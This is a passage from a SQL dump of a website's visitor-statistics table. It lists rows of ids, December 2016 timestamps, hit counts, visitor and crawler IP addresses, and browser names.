1482743459,1,1,0,0,'207.46.13.22','other'),(80226,1482743693,1,1,0,0,'94.179.13.22','firefox'),(80227,1482744131,1,1,0,0,'91.196.178.72','firefox'),(80228,1482744189,1,1,0,0,'178.95.246.49','firefox'),(80229,1482744394,1,1,0,0,'31.13.102.110','other'),(80230,1482744402,2,2,0,0,'31.13.114.53','other'),(80231,1482744436,1,1,0,0,'130.193.51.19','other'),(80232,1482744477,1,1,0,0,'91.196.177.15','chrome'),(80233,1482744604,1,1,0,0,'92.112.249.218','chrome'),(80234,1482744655,1,0,1,0,'66.249.75.183',''),(80235,1482744977,1,1,0,0,'91.196.177.46','chrome'),(80236,1482745306,1,1,0,0,'91.196.179.33','chrome'),(80237,1482745577,1,1,0,0,'178.95.246.49','firefox'),(80238,1482745735,1,1,0,0,'91.196.178.39','chrome'),(80239,1482746233,1,1,0,0,'180.76.15.140','other'),(80240,1482746972,1,1,0,0,'91.196.178.161','chrome'),(80241,1482747148,1,1,0,0,'91.196.178.72','chrome'),(80242,1482747482,131,131,0,0,'149.202.48.176','other'),(80243,1482747669,1,1,0,0,'178.94.31.207','firefox'),(80244,1482747783,1,1,0,0,'66.102.9.25','other'),(80245,1482748046,1,1,0,0,'91.196.178.66','chrome'),(80246,1482748993,1,1,0,0,'91.196.178.66','firefox'),(80247,1482749165,1,1,0,0,'95.132.132.113','firefox'),(80248,1482749493,1,1,0,0,'163.172.64.182','other'),(80249,1482749620,1,0,1,0,'66.249.75.179',''),(80250,1482749897,1,1,0,0,'91.196.178.37','chrome'),(80251,1482750501,1,1,0,0,'207.46.13.22','other'),(80252,1482751292,1,1,0,0,'93.183.215.130','chrome'),(80253,1482751340,1,1,0,0,'40.77.167.75','other'),(80254,1482751858,1,1,0,0,'163.172.64.242','other'),(80255,1482751883,1,1,0,0,'46.211.113.170','chrome'),(80256,1482752271,1,1,0,0,'62.212.73.211','other'),(80257,1482752573,1,1,0,0,'40.77.167.75','other'),(80258,1482752927,1,0,1,0,'66.249.75.179',''),(80259,1482753313,2,0,2,0,'66.249.69.152',''),(80260,1482753338,1,0,1,0,'66.249.69.149',''),(80261,1482753775,1,1,0,0,'163.172.64.235','other'),(80262,1482754324,1,1,0,0,'37.73.159.184','chrome'),(80263,1482754487,1,1,0,0,'91.196.178.72','firefox'),(80264,1482755236,1,1,0,0,'180.76.15.21','other'),(80265,1482755387,1,0,1,0,'66.249.75.187',''),(80266,1482756691,1,1,0,0,'195.49.151.99','chrome'),(80267,1482757034,1,1,0,0,'91.196.178.72','firefox'),(80268,1482757204,1,1,0,0,'91.196.178.67','firefox'),(80269,1482757736,1,1,0,0,'107.167.108.170','chrome'),(80270,1482758058,1,1,0,0,'91.196.177.26','chrome'),(80271,1482758405,1,1,0,0,'195.49.151.99','chrome'),(80272,1482758573,1,1,0,0,'207.46.13.4','other'),(80273,1482759885,2,2,0,0,'91.196.178.72','firefox'),(80274,1482759974,1,1,0,0,'194.44.231.246','firefox'),(80275,1482760696,1,1,0,0,'207.46.13.4','other'),(80276,1482760989,1,0,1,0,'68.180.228.38',''),(80277,1482761050,1,1,0,0,'91.196.178.69','chrome'),(80278,1482761884,53,53,0,0,'51.255.173.12','other'),(80279,1482762248,1,1,0,0,'66.102.9.27','other'),(80280,1482762710,2,2,0,0,'37.73.201.25','other'),(80281,1482763198,1,1,0,0,'91.196.178.72','firefox'),(80282,1482763547,1,0,1,0,'66.249.75.179',''),(80283,1482764648,1,1,0,0,'91.196.178.67','other'),(80284,1482764953,1,1,0,0,'195.49.151.99','chrome'),(80285,1482766243,1,1,0,0,'37.55.150.216','chrome'),(80286,1482766633,1,1,0,0,'78.111.190.20','chrome'),(80287,1482767665,1,1,0,0,'37.55.150.216','chrome'),(80288,1482768603,1,1,0,0,'157.55.39.220','other'),(80289,1482770235,1,1,0,0,'207.46.13.4','other'),(80290,1482770823,2,2,0,0,'163.172.32.175','other'),(80291,1482771057,1,1,0,0,'195.154.181.15','chrome'),(80292,1482771131,1,1,0,0,'195.154.181.162','chrome'),(80293,1482771676,1,0,1,0,'66.249.75.183',''),(80294,1482771697,1,1,0,0,'92.113.174.162','firefox'),(80295,1482772586,2,0,2,0,'66.249.75.179',''),(80296,1482772843,1,1,0,0,'198.204.240.42','chrome'),(80297,1482773041,1,0,1,0,'66.249.75.187',''),(80298,1482773129,1,1,0,0,'91.196.178.167','chrome'),(80299,1482773277,1,1,0,0,'213.108.45.138','firefox'),(80300,1482773295,1,1,0,0,'130.193.50.34','other'),(80301,1482773383,1,1,0,0,'180.76.15.16','other'),(80302,1482773680,1,0,1,0,'66.249.64.179',''),(80303,1482774411,1,1,0,0,'207.46.13.22','other'),(80304,1482774615,1,0,1,0,'66.249.64.183',''),(80305,1482775362,1,0,1,0,'66.249.64.187',''),(80306,1482775728,1,1,0,0,'91.196.178.67','firefox'),(80307,1482775989,1,1,0,0,'66.249.64.59','chrome'),(80308,1482776393,1,1,0,0,'66.102.9.29','other'),(80309,1482778721,1,0,1,0,'66.249.64.179',''),(80310,1482778938,1,1,0,0,'46.211.248.131','chrome'),(80311,1482780052,4,4,0,0,'174.34.135.242','other'),(80312,1482781023,1,1,0,0,'130.193.50.34','other'),(80313,1482781053,1,0,1,0,'66.249.64.183',''),(80314,1482782560,1,1,0,0,'93.158.152.84','other'),(80315,1482783167,1,0,1,0,'66.249.64.179',''),(80316,1482783553,13,13,0,0,'151.80.41.169','other'),(80317,1482783748,1,1,0,0,'93.158.152.84','other'),(80318,1482784072,1,0,1,0,'66.249.64.187',''),(80319,1482784533,1,1,0,0,'40.77.167.75','other'),(80320,1482784689,1,1,0,0,'94.179.237.57','chrome'),(80321,1482785096,1,0,1,0,'66.249.64.57',''),(80322,1482785336,1,1,0,0,'178.95.245.36','firefox'),(80323,1482786175,1,1,0,0,'78.111.185.194','chrome'),(80324,1482786904,1,1,0,0,'93.171.243.82','chrome'),(80325,1482787074,1,0,1,0,'66.249.64.179',''),(80326,1482788185,1,1,0,0,'92.113.174.162','firefox'),(80327,1482788278,2,2,0,0,'66.102.9.35','chrome'),(80328,1482788285,1,1,0,0,'91.196.178.100','chrome'),(80329,1482790861,1,1,0,0,'163.172.64.224','other'),(80330,1482790891,1,0,1,0,'66.249.64.57',''),(80331,1482791026,1,1,0,0,'66.102.9.25','other'),(80332,1482791029,1,1,0,0,'37.52.20.39','chrome'),(80333,1482791698,1,1,0,0,'207.46.13.22','other'),(80334,1482792207,1,0,1,0,'66.249.64.61',''),(80335,1482793309,1,1,0,0,'64.246.161.190','firefox'),(80336,1482794313,1,1,0,0,'207.46.13.4','other'),(80337,1482794480,1,1,0,0,'163.172.68.127','other'),(80338,1482794515,1,0,1,0,'66.249.64.179',''),(80339,1482795930,1,1,0,0,'180.76.15.31','other'),(80340,1482797199,1,1,0,0,'141.8.183.25','other'),(80341,1482797700,1,0,1,0,'66.249.64.187',''),(80342,1482798416,1,1,0,0,'141.8.142.61','other'),(80343,1482800696,1,0,1,0,'66.249.64.179',''),(80344,1482800852,5,5,0,0,'95.85.61.178','other'),(80345,1482801291,1,0,1,0,'66.249.64.183',''),(80346,1482801875,1,1,0,0,'207.46.13.131','other'),(80347,1482802735,1,1,0,0,'40.77.167.75','other'),(80348,1482802920,1,0,1,0,'66.249.64.179',''),(80349,1482803450,1,1,0,0,'130.193.50.34','other'),(80350,1482805194,1,1,0,0,'66.102.9.27','other'),(80351,1482805718,1,0,1,0,'66.249.64.179',''),(80352,1482806698,1,0,1,0,'66.249.64.179',''),(80353,1482809146,1,1,0,0,'163.172.64.254','other'),(80354,1482809301,1,1,0,0,'163.172.64.180','other'),(80355,1482809327,1,1,0,0,'207.46.13.22','other'),(80356,1482809546,1,1,0,0,'40.77.167.75','other'),(80357,1482810259,1,1,0,0,'66.249.64.59','chrome'),(80358,1482810424,1,1,0,0,'141.8.132.10','other'),(80359,1482811316,1,0,1,0,'66.249.64.187',''),(80360,1482811317,1,0,1,0,'66.249.64.179',''),(80361,1482811731,1,1,0,0,'66.249.64.59','chrome'),(80362,1482812325,1,1,0,0,'66.249.93.156','chrome'),(80363,1482815577,1,1,0,0,'66.102.9.27','chrome'),(80364,1482816845,1,1,0,0,'141.8.142.67','other'),(80365,1482816886,1,1,0,0,'66.249.64.57','chrome'),(80366,1482817062,1,1,0,0,'91.196.178.72','firefox'),(80367,1482818715,1,1,0,0,'195.154.181.162','chrome'),(80368,1482818857,1,1,0,0,'163.172.64.242','other'),(80369,1482819769,1,1,0,0,'66.102.9.27','other'),(80370,1482820063,2,2,0,0,'91.196.178.66','firefox'),(80371,1482820398,1,0,1,0,'66.249.64.187',''),(80372,1482820823,1,1,0,0,'91.196.178.72','chrome'),(80373,1482821133,1,1,0,0,'91.196.178.67','firefox'),(80374,1482821505,1,1,0,0,'94.153.192.46','firefox'),(80375,1482821634,1,1,0,0,'173.252.88.85','other'),(80376,1482822865,1,1,0,0,'78.111.185.25','firefox'),(80377,1482822998,1,1,0,0,'91.196.178.66','chrome'),(80378,1482823806,1,1,0,0,'195.78.69.17','firefox'),(80379,1482823818,1,1,0,0,'130.193.51.19','other'),(80380,1482824022,1,1,0,0,'163.172.64.237','other'),(80381,1482824139,1,1,0,0,'91.196.178.132','firefox'),(80382,1482824786,1,1,0,0,'91.196.178.66','chrome'),(80383,1482824852,1,1,0,0,'91.196.178.65','chrome'),(80384,1482824918,1,0,1,0,'66.249.64.187',''),(80385,1482825151,2,2,0,0,'91.196.177.46','firefox'),(80386,1482825844,1,1,0,0,'40.77.167.75','other'),(80387,1482826057,1,1,0,0,'91.196.178.67','chrome'),(80388,1482826101,1,1,0,0,'91.196.178.67','firefox'),(80389,1482826376,1,1,0,0,'93.74.212.147','firefox'),(80390,1482826581,1,1,0,0,'83.142.105.65','chrome'),(80391,1482826705,1,1,0,0,'178.95.244.90','firefox'),(80392,1482827492,1,1,0,0,'91.196.178.72','firefox'),(80393,1482827679,1,1,0,0,'91.214.16.122','msie'),(80394,1482828245,1,1,0,0,'91.196.178.72','chrome'),(80395,1482828253,33,33,0,0,'62.210.250.212','other'),(80396,1482829051,1,1,0,0,'94.179.30.251','chrome'),(80397,1482829721,1,1,0,0,'178.95.39.88','firefox'),(80398,1482829756,1,1,0,0,'130.193.51.19','other'),(80399,1482830928,1,1,0,0,'82.207.91.234','firefox'),(80400,1482831279,1,1,0,0,'141.8.183.25','other'),(80401,1482831784,1,1,0,0,'178.95.244.90','firefox'),(80402,1482831810,1,1,0,0,'95.135.59.147','msie'),(80403,1482833043,1,1,0,0,'94.179.30.251','chrome'),(80404,1482833155,1,1,0,0,'92.112.13.14','chrome'),(80405,1482833441,1,0,1,0,'66.249.64.187',''),(80406,1482833519,1,1,0,0,'91.196.178.65','chrome'),(80407,1482833619,2,2,0,0,'91.196.178.72','chrome'),(80408,1482834126,1,1,0,0,'66.102.9.27','other'),(80409,1482834212,1,0,1,0,'66.249.64.179',''),(80410,1482834885,1,1,0,0,'91.196.178.67','firefox'),(80411,1482835152,1,1,0,0,'91.196.177.26','chrome'),(80412,1482835313,1,1,0,0,'37.187.71.37','chrome'),(80414,1482835315,1,1,0,0,'94.74.75.215','chrome'),(80415,1482835592,1,1,0,0,'91.222.17.87','chrome'),(80416,1482835620,1,1,0,0,'130.193.50.34','other'),(80417,1482835631,2,2,0,0,'91.196.178.65','chrome'),(80418,1482835938,1,1,0,0,'91.196.177.134','chrome'),(80419,1482835992,1,1,0,0,'82.145.222.172','other'),(80420,1482836139,1,1,0,0,'91.196.178.68','chrome'),(80421,1482836216,1,1,0,0,'91.196.178.40','firefox'),(80422,1482836336,1,1,0,0,'91.196.178.66','firefox'),(80423,1482836828,1,1,0,0,'91.196.178.168','chrome'),(80424,1482837004,1,1,0,0,'141.8.183.25','other'),(80425,1482837076,1,1,0,0,'91.196.178.67','chrome'),(80426,1482837832,1,1,0,0,'91.196.178.167','chrome'),(80427,1482839495,1,0,1,0,'66.249.64.187',''),(80428,1482839537,1,1,0,0,'130.180.216.90','firefox'),(80429,1482839803,1,1,0,0,'66.249.64.57','chrome'),(80430,1482839852,2,1,1,0,'66.249.64.187',''),(80431,1482839917,1,0,1,0,'66.249.64.179',''),(80432,1482840321,1,1,0,0,'195.88.208.134','chrome'),(80433,1482840355,1,1,0,0,'163.172.68.121','other'),(80434,1482841104,1,0,1,0,'66.249.64.183',''),(80435,1482841262,1,1,0,0,'92.113.174.162','firefox'),(80436,1482841409,1,1,0,0,'130.180.216.90','firefox'),(80437,1482841866,1,1,0,0,'178.95.244.90','firefox'),(80438,1482842275,1,0,1,0,'66.249.64.183',''),(80439,1482842281,1,1,0,0,'193.106.58.200','chrome'),(80440,1482842346,1,1,0,0,'95.135.59.147','other'),(80441,1482842512,1,0,1,0,'66.249.64.187',''),(80442,1482842951,1,1,0,0,'185.120.133.186','other'),(80443,1482843148,1,1,0,0,'195.49.151.99','chrome'),(80444,1482843815,1,1,0,0,'95.132.53.160','firefox'),(80445,1482843831,1,1,0,0,'141.8.142.153','other'),(80446,1482844924,2,0,2,0,'66.249.64.187',''),(80447,1482844971,1,0,1,0,'66.249.64.59',''),(80448,1482845149,1,0,1,0,'66.249.64.179',''),(80449,1482845263,1,1,0,0,'83.149.126.98','other'),(80450,1482845476,1,0,1,0,'66.249.64.183',''),(80451,1482845496,1,1,0,0,'92.113.189.105','chrome'),(80452,1482845537,1,1,0,0,'91.196.179.61','chrome'),(80453,1482845770,1,1,0,0,'91.196.178.38','other'),(80454,1482845953,1,1,0,0,'91.196.178.69','firefox'),(80455,1482846280,1,1,0,0,'207.46.13.131','other'),(80456,1482846474,1,1,0,0,'93.171.218.138','chrome'),(80457,1482846689,1,1,0,0,'46.219.240.104','chrome'),(80458,1482846773,1,1,0,0,'193.19.152.14','other'),(80459,1482847460,1,1,0,0,'195.211.175.88','firefox'),(80460,1482847687,1,1,0,0,'37.115.81.42','chrome'),(80461,1482847835,1,1,0,0,'91.209.214.11','firefox'),(80462,1482847922,1,1,0,0,'188.244.45.91','chrome'),(80463,1482848496,1,1,0,0,'66.102.9.27','other'),(80464,1482849082,1,1,0,0,'178.92.94.22','chrome'),(80465,1482849101,1,1,0,0,'130.193.50.34','other'),(80466,1482849313,1,0,1,0,'66.249.64.179',''),(80467,1482849528,1,1,0,0,'66.249.64.61','chrome'),(80468,1482849600,1,1,0,0,'66.249.64.183','chrome'),(80469,1482849630,1,1,0,0,'207.46.13.131','other'),(80470,1482849635,2,2,0,0,'66.249.64.179','chrome'),(80471,1482849743,1,1,0,0,'91.196.178.40','firefox'),(80472,1482849954,1,0,1,0,'66.249.64.59',''),(80473,1482850170,1,1,0,0,'31.168.61.68','chrome'),(80474,1482850430,1,0,1,0,'66.249.64.187',''),(80475,1482850889,1,0,1,0,'66.249.64.179',''),(80476,1482851822,1,1,0,0,'91.196.178.67','msie'),(80477,1482851943,1,0,1,0,'66.249.64.179',''),(80478,1482852613,1,1,0,0,'178.95.244.90','firefox'),(80479,1482853495,3,3,0,0,'192.187.104.235','other'),(80480,1482853804,1,0,1,0,'66.249.64.187',''),(80481,1482854811,1,1,0,0,'128.0.105.65','chrome'),(80482,1482854833,1,1,0,0,'130.193.50.34','other'),(80483,1482854983,2,2,0,0,'91.196.177.15','chrome'),(80484,1482855497,1,1,0,0,'92.113.174.162','firefox'),(80485,1482855559,1,1,0,0,'207.46.13.131','other'),(80486,1482856256,1,0,1,0,'66.249.64.187',''),(80487,1482856943,1,0,1,0,'66.249.64.183',''),(80488,1482857842,1,1,0,0,'92.113.174.162','firefox'),(80489,1482858335,2,2,0,0,'66.249.64.183','chrome'),(80490,1482858424,1,1,0,0,'94.179.39.120','firefox'),(80491,1482858446,1,1,0,0,'66.249.64.179','chrome'),(80492,1482858943,1,1,0,0,'94.178.146.203','chrome'),(80493,1482859637,1,1,0,0,'5.9.98.178','other'),(80494,1482859682,1,0,1,0,'66.249.64.183',''),(80495,1482860530,1,1,0,0,'195.49.151.99','chrome'),(80496,1482860538,1,1,0,0,'5.9.98.178','other'),(80497,1482860831,1,1,0,0,'110.77.148.71','chrome'),(80498,1482861444,1,1,0,0,'5.9.98.178','other'),(80499,1482862100,1,1,0,0,'5.255.253.67','other'),(80500,1482862347,1,1,0,0,'5.9.98.178','other'),(80501,1482862983,1,1,0,0,'66.102.9.25','other'),(80502,1482863275,1,1,0,0,'91.196.178.70','firefox'),(80503,1482863717,1,1,0,0,'91.196.178.66','chrome'),(80504,1482864023,1,0,1,0,'66.249.64.183',''),(80505,1482864501,1,1,0,0,'66.102.9.25','chrome'),(80506,1482865164,1,0,1,0,'66.249.64.187',''),(80507,1482865579,1,1,0,0,'86.154.70.56','other'),(80508,1482865850,1,1,0,0,'82.145.222.49','other'),(80509,1482865865,1,1,0,0,'91.124.7.175','chrome'),(80510,1482866595,1,0,1,0,'66.249.64.183',''),(80511,1482866799,1,1,0,0,'207.46.13.131','other'),(80512,1482867393,1,1,0,0,'91.196.178.102','chrome'),(80513,1482868683,1,1,0,0,'109.122.59.116','chrome'),(80514,1482869754,2,0,2,0,'66.249.64.187',''),(80515,1482870002,1,1,0,0,'46.211.200.78','chrome'),(80516,1482870547,1,0,1,0,'66.249.64.183',''),(80517,1482871204,1,1,0,0,'91.196.178.34','firefox'),(80518,1482871606,2,0,2,0,'66.249.64.183',''),(80519,1482872022,1,1,0,0,'37.55.57.165','other'),(80520,1482873570,1,1,0,0,'78.111.187.220','chrome'),(80521,1482873948,1,1,0,0,'37.55.57.165','other'),(80522,1482875276,1,0,1,0,'66.249.64.183',''),(80523,1482875392,1,1,0,0,'66.249.64.183','chrome'),(80524,1482875758,3,3,0,0,'51.255.47.7','other'),(80525,1482876212,1,0,1,0,'66.249.64.187',''),(80526,1482876560,1,1,0,0,'207.46.13.4','other'),(80527,1482877421,1,1,0,0,'66.102.9.25','other'),(80528,1482878416,1,1,0,0,'66.249.64.183','chrome'),(80529,1482878482,1,1,0,0,'66.249.64.187','chrome'),(80531,1482879843,1,0,1,0,'66.249.64.179',''),(80532,1482880516,1,1,0,0,'66.249.64.183','chrome'),(80533,1482881118,2,0,2,0,'66.249.64.187',''),(80534,1482882685,3,0,3,0,'66.249.64.187',''),(80535,1482885455,1,0,1,0,'66.249.64.57',''),(80536,1482886063,1,1,0,0,'176.195.110.151','other'),(80537,1482887341,1,0,1,0,'66.249.64.183',''),(80538,1482887656,1,0,1,0,'66.249.64.187',''),(80539,1482889974,2,0,2,0,'66.249.64.183',''),(80540,1482890526,1,1,0,0,'163.172.64.216','other'),(80541,1482891208,1,1,0,0,'163.172.68.122','other'),(80542,1482891792,1,0,1,0,'66.249.64.179',''),(80543,1482892249,1,0,1,0,'66.249.64.183',''),(80544,1482892267,1,1,0,0,'66.102.9.29','other'),(80545,1482893637,1,1,0,0,'163.172.64.177','other'),(80546,1482893944,1,0,1,0,'66.249.64.183',''),(80547,1482894949,1,1,0,0,'163.172.64.224','other'),(80548,1482895630,1,0,1,0,'66.249.64.187',''),(80549,1482895710,1,1,0,0,'180.76.15.146','other'),(80550,1482896924,1,1,0,0,'163.172.64.229','other'),(80551,1482897184,1,1,0,0,'130.193.51.43','other'),(80552,1482897608,1,0,1,0,'66.249.64.179',''),(80553,1482898659,1,0,1,0,'66.249.64.59',''),(80554,1482900126,1,0,1,0,'66.249.64.187',''),(80555,1482900908,1,0,1,0,'66.249.64.57',''),(80556,1482901315,1,0,1,0,'66.249.64.183',''),(80557,1482903031,1,1,0,0,'163.172.64.193','other'),(80558,1482903308,1,1,0,0,'91.196.178.71','firefox'),(80559,1482903537,1,0,1,0,'66.249.64.183',''),(80560,1482904600,1,0,1,0,'66.249.64.59',''),(80561,1482906089,1,1,0,0,'66.102.9.27','other'),(80562,1482906962,1,1,0,0,'91.196.178.67','chrome'),(80563,1482907282,2,2,0,0,'173.208.157.186','other'),(80564,1482907351,22,22,0,0,'46.4.32.75','other'),(80565,1482907641,1,0,1,0,'66.249.64.179',''),(80566,1482907918,1,0,1,0,'66.249.64.187',''),(80567,1482909365,1,0,1,0,'66.249.64.61',''),(80568,1482909506,1,0,1,0,'66.249.64.179',''),(80569,1482909867,1,0,1,0,'66.249.64.183',''),(80570,1482910064,1,1,0,0,'130.180.217.107','firefox'),(80571,1482910265,1,1,0,0,'40.77.167.75','other'),(80572,1482910535,1,0,1,0,'66.249.64.179',''),(80573,1482910767,1,1,0,0,'178.93.153.163','firefox'),(80574,1482911414,1,1,0,0,'178.255.215.94','other'),(80575,1482911497,1,1,0,0,'37.53.136.31','chrome'),(80576,1482911866,2,2,0,0,'40.77.167.75','other'),(80577,1482912022,1,0,1,0,'66.249.64.187',''),(80578,1482912210,1,0,1,0,'66.249.64.179',''),(80579,1482913844,1,1,0,0,'130.193.50.34','other'),(80580,1482913898,1,1,0,0,'141.8.142.58','other'),(80581,1482914603,1,1,0,0,'37.55.197.206','chrome'),(80582,1482914714,1,1,0,0,'91.196.177.26','chrome'),(80583,1482914798,1,1,0,0,'163.172.64.189','other'),(80584,1482915875,1,0,1,0,'66.249.64.183',''),(80585,1482916326,1,0,1,0,'66.249.64.187',''),(80586,1482916336,1,1,0,0,'163.172.64.226','other'),(80587,1482916532,1,1,0,0,'130.180.218.91','chrome'),(80588,1482916583,1,1,0,0,'95.28.44.204','msie'),(80589,1482916935,2,2,0,0,'91.196.178.131','chrome'),(80590,1482917429,1,0,1,0,'66.249.64.179',''),(80591,1482919064,1,1,0,0,'46.219.250.52','chrome'),(80592,1482919182,1,0,1,0,'66.249.64.179',''),(80593,1482920021,1,1,0,0,'37.55.151.63','firefox'),(80594,1482920319,1,0,1,0,'66.249.64.59',''),(80595,1482920503,1,1,0,0,'66.102.9.29','other'),(80596,1482920672,1,1,0,0,'91.196.178.70','firefox'),(80597,1482921067,2,2,0,0,'91.196.177.46','firefox'),(80598,1482921158,1,1,0,0,'91.196.178.66','chrome'),(80599,1482921174,1,1,0,0,'130.193.51.19','other'),(80600,1482921309,2,2,0,0,'178.95.176.49','firefox'),(80601,1482921319,2,2,0,0,'157.55.39.150','other'),(80602,1482921948,1,1,0,0,'141.8.142.61','other'),(80603,1482922105,1,1,0,0,'91.196.177.46','firefox'),(80604,1482922501,2,2,0,0,'195.10.210.49','chrome'),(80605,1482922778,1,1,0,0,'194.44.83.0','opera'),(80606,1482923204,1,1,0,0,'180.76.15.143','other'),(80607,1482923721,1,0,1,0,'66.249.64.183',''),(80608,1482924135,1,1,0,0,'194.44.83.0','opera'),(80609,1482924160,1,1,0,0,'130.180.217.231','firefox'),(80610,1482924632,1,1,0,0,'163.172.64.192','other'),(80611,1482925080,1,1,0,0,'141.8.183.19','other'),(80612,1482925524,1,1,0,0,'193.109.128.178','chrome'),(80613,1482925535,1,1,0,0,'130.193.50.34','other'),(80614,1482925900,1,1,0,0,'157.55.39.62','other'),(80615,1482926906,1,0,1,0,'66.249.64.179',''),(80616,1482927078,1,1,0,0,'163.172.64.236','other'),(80617,1482928181,4,4,0,0,'213.251.184.38','other'),(80618,1482928468,2,0,2,0,'66.249.64.183',''),(80619,1482928551,1,1,0,0,'157.55.39.150','other'),(80620,1482928653,1,1,0,0,'180.76.15.19','other'),(80621,1482928751,1,1,0,0,'83.149.126.98','other'),(80622,1482928794,1,0,1,0,'66.249.64.187',''),(80623,1482928923,1,1,0,0,'91.196.178.67','chrome'),(80624,1482930016,1,1,0,0,'92.112.224.250','chrome'),(80625,1482930265,1,0,1,0,'66.249.64.187',''),(80626,1482930775,1,1,0,0,'163.172.64.233','other'),(80627,1482930830,1,1,0,0,'91.196.178.162','chrome'),(80628,1482932135,1,1,0,0,'95.134.221.88','chrome'),(80629,1482932535,1,1,0,0,'91.196.178.72','firefox'),(80630,1482933548,1,1,0,0,'130.180.209.162','chrome'),(80631,1482933582,1,1,0,0,'141.8.142.58','other'),(80632,1482934334,1,1,0,0,'91.196.178.40','firefox'),(80633,1482934409,1,1,0,0,'91.196.178.162','chrome'),(80634,1482934952,1,1,0,0,'66.102.9.25','other'),(80635,1482935239,1,1,0,0,'66.249.64.59','chrome'),(80636,1482935496,1,1,0,0,'66.102.9.27','chrome'),(80637,1482936038,1,1,0,0,'91.196.178.161','chrome'),(80638,1482936065,1,0,1,0,'66.249.64.187',''),(80639,1482938298,1,1,0,0,'163.172.64.228','other'),(80640,1482938605,1,0,1,0,'66.249.64.187',''),(80641,1482938880,1,1,0,0,'40.77.167.75','other'),(80642,1482939009,1,1,0,0,'91.196.177.15','chrome'),(80643,1482939369,1,0,1,0,'66.249.64.183',''),(80644,1482939592,1,1,0,0,'91.196.178.71','chrome'),(80645,1482939670,1,1,0,0,'217.69.133.30','other'),(80646,1482940162,1,0,1,0,'66.249.64.179',''),(80647,1482940439,1,0,1,0,'66.249.64.187',''),(80648,1482941552,1,1,0,0,'46.211.1.183','chrome'),(80649,1482941630,1,1,0,0,'195.49.151.99','chrome'),(80650,1482942020,1,0,1,0,'66.249.75.187',''),(80651,1482942092,1,0,1,0,'66.249.75.179',''),(80652,1482942232,1,1,0,0,'157.55.39.62','other'),(80653,1482942666,1,0,1,0,'66.249.69.149',''),(80654,1482943006,1,1,0,0,'130.193.50.34','other'),(80655,1482943378,1,1,0,0,'163.172.64.242','other'),(80656,1482943587,3,3,0,0,'37.157.193.84','other'),(80657,1482944070,1,0,1,0,'66.249.75.187',''),(80658,1482944452,1,1,0,0,'180.76.15.34','other'),(80659,1482944699,1,0,1,0,'66.249.75.183',''),(80660,1482945091,1,1,0,0,'217.66.152.116','other'),(80661,1482949017,1,1,0,0,'163.172.64.236','other'),(80662,1482949216,1,0,1,0,'66.249.75.187',''),(80663,1482949308,1,1,0,0,'66.102.9.27','other'),(80664,1482949876,1,1,0,0,'130.180.218.91','chrome'),(80665,1482949928,1,1,0,0,'94.179.8.248','chrome'),(80666,1482950063,1,1,0,0,'178.255.215.94','other'),(80667,1482951545,1,0,1,0,'66.249.75.179',''),(80668,1482951637,1,1,0,0,'178.137.49.175','chrome'),(80669,1482952171,1,0,1,0,'66.249.75.183',''),(80670,1482952716,1,1,0,0,'130.193.51.19','other'),(80671,1482952765,1,1,0,0,'94.179.48.9','chrome'),(80672,1482952842,1,1,0,0,'163.172.64.243','other'),(80673,1482954390,1,1,0,0,'91.196.178.34','chrome'),(80674,1482954580,1,1,0,0,'180.76.15.30','other'),(80675,1482954670,1,1,0,0,'157.55.39.62','other'),(80676,1482955331,1,1,0,0,'141.8.142.61','other'),(80677,1482956906,1,1,0,0,'92.113.174.174','firefox'),(80678,1482957082,1,1,0,0,'95.134.221.78','chrome'),(80679,1482957295,1,1,0,0,'46.211.156.35','other'),(80680,1482957381,1,1,0,0,'31.134.113.4','firefox'),(80681,1482957719,1,0,1,0,'66.249.69.152',''),(80682,1482958065,1,1,0,0,'163.172.64.248','other'),(80683,1482960222,1,1,0,0,'40.77.167.75','other'),(80684,1482961619,1,1,0,0,'163.172.64.185','other'),(80685,1482961700,1,1,0,0,'157.55.39.150','other'),(80686,1482962507,1,1,0,0,'40.77.167.75','other'),(80687,1482962777,1,1,0,0,'178.92.73.44','chrome'),(80688,1482965123,2,0,2,0,'66.249.75.187',''),(80689,1482965964,1,1,0,0,'188.213.49.133','other'),(80690,1482967067,1,0,1,0,'66.249.75.187',''),(80691,1482967146,1,1,0,0,'163.172.64.246','other'),(80692,1482967524,7,7,0,0,'5.9.89.170','other'),(80693,1482967887,1,1,0,0,'66.249.69.155','chrome'),(80694,1482967891,1,1,0,0,'66.249.75.183','chrome'),(80695,1482970171,1,0,1,0,'66.249.75.179',''),(80696,1482972151,1,0,1,0,'66.249.75.187',''),(80697,1482972999,1,1,0,0,'163.172.64.183','other'),(80698,1482973398,1,1,0,0,'157.55.39.150','other'),(80699,1482975709,1,1,0,0,'66.249.75.183','chrome'),(80700,1482977412,1,0,1,0,'66.249.75.187',''),(80701,1482977958,1,0,1,0,'66.249.75.183',''),(80702,1482978243,1,1,0,0,'66.102.9.27','other'),(80703,1482978685,1,0,1,0,'66.249.69.152',''),(80704,1482981614,1,1,0,0,'40.77.167.75','other'),(80705,1482982967,1,0,1,0,'66.249.69.152',''),(80706,1482983790,1,1,0,0,'195.154.181.15','chrome'),(80707,1482983940,1,1,0,0,'157.55.39.62','other'),(80708,1482984697,1,1,0,0,'66.102.9.29','chrome'),(80709,1482985440,1,1,0,0,'82.145.223.78','other'),(80710,1482986228,1,0,1,0,'66.249.75.187',''),(80711,1482987113,2,0,2,0,'66.249.75.183',''),(80712,1482987429,1,0,1,0,'66.249.75.179',''),(80713,1482988208,1,1,0,0,'163.172.64.225','other'),(80714,1482988313,1,0,1,0,'66.249.69.149',''),(80715,1482989635,1,1,0,0,'91.196.178.69','firefox'),(80716,1482989846,1,0,1,0,'66.249.75.179',''),(80717,1482990355,1,0,1,0,'66.249.75.187',''),(80718,1482991637,1,0,1,0,'66.249.75.179',''),(80719,1482992436,1,1,0,0,'66.249.75.179','chrome'),(80720,1482993126,1,1,0,0,'83.149.126.98','other'),(80721,1482993782,1,1,0,0,'91.196.178.66','chrome'),(80722,1482993809,1,0,1,0,'66.249.75.183',''),(80723,1482994003,1,0,1,0,'66.249.69.152',''),(80724,1482994428,1,1,0,0,'77.93.41.218','chrome'),(80725,1482995817,1,1,0,0,'91.196.178.67','chrome'),(80726,1482995985,1,0,1,0,'66.249.75.179',''),(80727,1482996268,2,0,2,0,'66.249.75.187',''),(80728,1482997173,1,1,0,0,'91.196.178.66','chrome'),(80729,1482997998,1,1,0,0,'78.111.190.108','firefox'),(80730,1482998010,1,0,1,0,'66.249.75.187',''),(80731,1482998035,1,1,0,0,'178.95.246.111','firefox'),(80732,1482998423,1,1,0,0,'180.76.15.8','other'),(80733,1482999218,1,1,0,0,'91.196.176.13','chrome'),(80734,1483000326,1,1,0,0,'91.1